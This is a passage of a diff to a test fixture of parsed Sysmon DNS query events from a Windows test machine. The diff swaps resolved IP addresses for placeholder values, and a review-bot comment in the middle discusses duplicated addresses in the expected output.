SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.101.225;::ffff:34.196.57.87;::ffff:34.194.164.46;::ffff:34.233.181.142;::ffff:34.194.167.169;::ffff:34.193.242.172;::ffff:34.234.152.11;::ffff:34.206.12.124;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent 
xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -2371,27 +2354,27 @@ }, "answers": [ { - "data": "151.101.194.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.79", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.194.79", - "151.101.2.79", - "151.101.66.79", - "151.101.130.79" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -2406,16 +2389,13 @@ "clarium.freetls.fastly.net" ], "ip": [ - "151.101.194.79", - "151.101.2.79", - "151.101.66.79", - "151.101.130.79" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741191200Z", + "ingested": "2021-12-09T13:50:23.456718Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.194.79;::ffff:151.101.2.79;::ffff:151.101.66.79;::ffff:151.101.130.79;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -2475,39 +2455,39 @@ }, "answers": [ { - "data": "68.67.178.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.11", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.228", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.184", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.197", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -2515,7 +2495,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -2523,24 +2503,24 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "68.67.178.252", - "68.67.179.11", - "68.67.179.228", - "68.67.178.184", - "204.13.192.141", - "68.67.180.43", - "68.67.179.23", - "68.67.179.197", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { 
@@ -2555,25 +2535,18 @@ "nym1-ib.adnxs.com" ], "ip": [ - "68.67.178.252", - "68.67.179.11", - "68.67.179.228", - "68.67.178.184", - "204.13.192.141", - "68.67.180.43", - "68.67.179.23", - "68.67.179.197", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741200700Z", + "ingested": "2021-12-09T13:50:23.456722600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:68.67.178.252;::ffff:68.67.179.11;::ffff:68.67.179.228;::ffff:68.67.178.184;::ffff:204.13.192.141;::ffff:68.67.180.43;::ffff:68.67.179.23;::ffff:68.67.179.197;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2641,52 +2614,52 @@ "type": "CNAME" }, { - "data": "34.196.86.129", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.250.110", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.244.108", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.224.204.11", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.237.44.255", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.210.231.21", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.172.198.255", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.199.186.227", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "34.196.86.129", - "34.233.250.110", - "18.209.244.108", - "34.224.204.11", - "34.237.44.255", - "3.210.231.21", - "54.172.198.255", - "34.199.186.227", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { 
@@ -2703,21 +2676,14 @@ "eb2.3lift.com" ], "ip": [ - "34.196.86.129", - "34.233.250.110", - "18.209.244.108", - "34.224.204.11", - "34.237.44.255", - "3.210.231.21", - "54.172.198.255", - "34.199.186.227", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741209700Z", + "ingested": "2021-12-09T13:50:23.456728Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:34.196.86.129;::ffff:34.233.250.110;::ffff:18.209.244.108;::ffff:34.224.204.11;::ffff:34.237.44.255;::ffff:3.210.231.21;::ffff:54.172.198.255;::ffff:34.199.186.227;192.5.6.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -2792,11 +2758,11 @@ "type": "CNAME" }, { - "data": "108.174.10.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -2804,7 +2770,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -2812,7 +2778,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -2820,7 +2786,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -2828,21 +2794,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "108.174.10.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -2859,22 +2825,22 @@ "px.ads.linkedin.com" ], "ip": [ - "108.174.10.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741216700Z", + "ingested": "2021-12-09T13:50:23.456733200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 
any-na.mix.linkedin.com;::ffff:108.174.10.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2942,22 +2908,22 @@ "type": "CNAME" }, { - "data": "40.90.23.239", + "data": "89.160.20.156", "type": "A" }, { - "data": "40.90.23.213", + "data": "89.160.20.156", "type": "A" }, { - "data": "40.90.23.154", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "40.90.23.239", - "40.90.23.213", - "40.90.23.154" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
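Review bot: In the `@@ -2942,22 +2908,22 @@` hunk the new `resolved_ip` array pins the same address three times (`"89.160.20.156", "89.160.20.156", "89.160.20.156"`), while the `ip` array in the following `@@ -2974` hunk carries it once, so this fixture now asserts that `dns.resolved_ip` keeps duplicates but the related-IP list does not. If the pipeline is meant to emit a set in both places the expected file is locking in the wrong behavior; if the duplicates are deliberate, that asymmetry deserves a sentence in the data stream's pipeline test config so the next regeneration does not "fix" it. The same collapse recurs in the `@@ -3209`, `@@ -3452` and `@@ -3693` hunks, where eight or seven distinct A records become one repeated address, which also means the fixture no longer exercises a query that resolves to several distinct public addresses. Using two or three different addresses from the supported subset across those answers would keep that coverage without reintroducing unsupported IPs.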
@@ -2974,15 +2940,13 @@ "login.live.com" ], "ip": [ - "40.90.23.239", - "40.90.23.213", - "40.90.23.154" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741223300Z", + "ingested": "2021-12-09T13:50:23.456737Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:40.90.23.239;::ffff:40.90.23.213;::ffff:40.90.23.154;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData 